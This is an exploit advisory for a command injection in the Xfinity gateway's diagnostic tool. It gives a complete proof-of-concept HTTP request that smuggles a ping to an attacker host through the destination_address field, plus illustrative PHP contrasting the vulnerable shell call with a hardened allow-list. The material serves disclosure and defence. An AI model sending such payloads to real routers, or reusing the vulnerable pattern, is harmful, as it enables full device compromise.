# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php

The page at /network_diagnostic_tools.php has a "test connectivity" feature, which is carried out through a POST request to /actionHandler/ajax_network_diagnostic_tools.php. The destination_address parameter of that request is vulnerable to OS command injection: its value is passed to a shell command without sanitisation, so shell metacharacters in it run attacker-chosen commands on the gateway.

PoC:

POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4

To verify, open Wireshark on attackerip with the display filter ip.dst==attackerip and icmp: the router issues three ICMP echo requests to attackerip, proving that the injected ping command ran on the device. Since any command can be substituted for the ping, this can be leveraged to completely compromise the device.
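How this class of bug typically arises in a PHP handler, and one way to harden it, as an added example: this is illustrative code written for this page, not the gateway's firmware and not the author's exploit. The parameter names (destination_address, count1) come from the PoC above; the shell_exec() call, the function names and the hostname allow-list are assumptions about how such a handler is usually written.

```php
<?php
// Added example, not code from the gateway firmware or from the original
// advisory: the pattern that produces this class of bug in a PHP
// "test connectivity" handler, next to a hardened form. The parameter
// names follow the PoC; the shell_exec() call and the function names here
// are assumptions about how such a handler is typically written.

// Vulnerable pattern: POST parameters are concatenated straight into a
// shell command line, so a destination_address of
// "www.comcast.net || ping -c3 attackerip;" runs a second command.
function run_ping_vulnerable(string $destination, string $count): string
{
    return (string) shell_exec("ping -c $count $destination 2>&1");
}

// Hardened form: allow-list the destination before it goes near a shell.
// Accepts an IPv4/IPv6 literal or an RFC 1123 hostname and rejects
// everything else, including shell metacharacters, whitespace, and values
// starting with '-' (which ping would parse as an option).
function validate_destination(string $destination): ?string
{
    $destination = trim($destination);
    if (filter_var($destination, FILTER_VALIDATE_IP) !== false) {
        return $destination;
    }
    // One hostname label: 1-63 chars, alphanumeric at both ends.
    $label  = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $hostRe = '/^' . $label . '(?:\.' . $label . ')*\.?$/';
    if (strlen($destination) <= 253 && preg_match($hostRe, $destination) === 1) {
        return $destination;
    }
    return null;
}

function run_ping_hardened(string $destination, string $count): string
{
    $dest = validate_destination($destination);
    if ($dest === null) {
        http_response_code(400);
        return json_encode(['error' => 'invalid destination_address']);
    }
    // count1 becomes a bounded integer, never raw input.
    $n = (int) $count;
    if ($n < 1 || $n > 10) {
        $n = 4;
    }
    // escapeshellarg() is defence in depth; the allow-list above is the
    // control that actually stops the injection.
    $cmd = 'ping -c ' . escapeshellarg((string) $n) . ' '
         . escapeshellarg($dest) . ' 2>&1';
    return (string) shell_exec($cmd);
}

// Constructed inputs, including the PoC payload; this only exercises the
// validator, so nothing is pinged when the file is run.
$checks = [
    'www.comcast.net'                         => true,
    '10.0.0.1'                                => true,
    'www.comcast.net || ping -c3 attackerip;' => false,
    '-f'                                      => false,
];
foreach ($checks as $input => $expected) {
    $accepted = validate_destination($input) !== null;
    printf("%-45s %s\n", $input, $accepted === $expected ? 'ok' : 'MISMATCH');
}
```

On PHP 7.4 and later the shell can be avoided entirely by passing the command to proc_open() as an array ('ping', '-c', $n, $dest), which hands the arguments to the binary without any shell parsing; the allow-list is still worth keeping, because an argument like "-f" is an option to ping, not a shell metacharacter, and no quoting layer catches it.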

This vulnerability is also particularly dangerous because there is no CSRF protection in this application, as demonstrated here: https://www.exploit-db.com/exploits/40853/